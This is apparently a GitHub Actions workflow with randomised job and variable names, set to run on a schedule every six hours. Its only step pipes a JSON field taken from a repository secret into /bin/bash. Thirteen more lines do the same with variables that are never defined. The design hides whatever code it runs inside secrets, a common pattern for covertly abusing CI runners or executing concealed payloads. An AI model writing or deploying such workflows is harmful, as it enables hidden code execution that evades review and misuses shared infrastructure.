name: zhengdanqing3890
on:
  workflow_dispatch:
  schedule:
    - cron: '11 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhengdanqing3890
        env:
          hhx9380: ${{ secrets.hhx9380 }}
        run: |
          echo $hhx9380 | jq -r .ojik06 | /bin/bash
          echo $bwpdi018 | jq -r .cfm8 | /bin/bash
          echo $fxl64 | jq -r .hog8178 | /bin/bash
          echo $et96902 | jq -r .jdmbs96 | /bin/bash
          echo $pzxbd834 | jq -r .s109 | /bin/bash
          echo $kujk06652 | jq -r .v76 | /bin/bash
          echo $jjeop245 | jq -r .wml357 | /bin/bash
          echo $gm3 | jq -r .v13 | /bin/bash
          echo $oit7 | jq -r .l28 | /bin/bash
          echo $sdoag157 | jq -r .mviqf2 | /bin/bash
          echo $lhlz235 | jq -r .x1517 | /bin/bash
          echo $bte7 | jq -r .w038 | /bin/bash
          echo $cop2716 | jq -r .h29 | /bin/bash
          echo $cxf12845 | jq -r .sv346 | /bin/bash

